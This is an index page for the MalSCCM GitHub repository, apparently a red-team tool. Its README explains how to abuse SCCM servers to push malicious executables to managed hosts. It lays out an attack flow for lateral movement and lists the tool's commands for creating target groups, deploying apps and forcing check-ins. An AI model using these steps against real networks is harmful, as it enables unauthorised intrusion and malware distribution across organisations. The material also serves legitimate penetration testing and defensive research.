Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nettitude/MalSCCM
https://github.com/nettitude/MalSCCM
Last synced: about 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/nettitude/MalSCCM
- Owner: nettitude
- Created: 2022-05-04T08:27:27.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2023-09-28T17:29:50.000Z (over 1 year ago)
- Last Synced: 2024-08-05T17:26:00.034Z (5 months ago)
- Language: C#
- Size: 14.6 KB
- Stars: 241
- Watchers: 9
- Forks: 37
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - nettitude/MalSCCM - (C# #)
README
# MalSCCM
This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage. To use this tool your current process must have admin rights over the SCCM server.
Typically deployments of SCCM will either have the management server and the primary server on the same host, in which case the host returned from the locate command can be used as the primary server.
If that is not the case you will need to compromise the management host returned with locate so that you can then run locate again on that host and get the primary server hostname. Once you have that and admin access you are good to go!
# Blog
For more information on usage of the tool, refer to the blog below.
* https://labs.nettitude.com/blog/introducing-malsccm/
# Credits
Massive credit to PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) which this is all based off, this would not have been done without the work of @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.
# Attack Flow
* Compromise client, use locate to find management server
* Compromise management server, use locate to find primary server
* use Inspect on primary server to view who you can target
* Create a new device group for the machines you want to laterally move too
* Add your targets into the new group
* Create an application pointing to a malicious EXE on a world readable share
* Deploy the application to the target group
* Force the target group to checkin for updates
* Profit...
* Cleanup the application and deployment
* Delete the group# Help menu
```
Commands listed below have optional parameters in <>.Attempt to find the SCCM management and primary servers:
MalSCCM.exe locateInspect the primary server to gather SCCM information:
MalSCCM.exe inspectCreate/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device]
MalSCCM.exe group /delete /groupname:example
MalSCCM.exe group /addhost /groupname:example /host:examplehost
MalSCCM.exe group /adduser /groupname:example /user:exampleuserCreate/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path""
MalSCCM.exe app /delete /name:appname
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2
MalSCCM.exe app /deletedeploy /name:appname
MalSCCM.exe app /cleanup /name:appnameForce devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example
```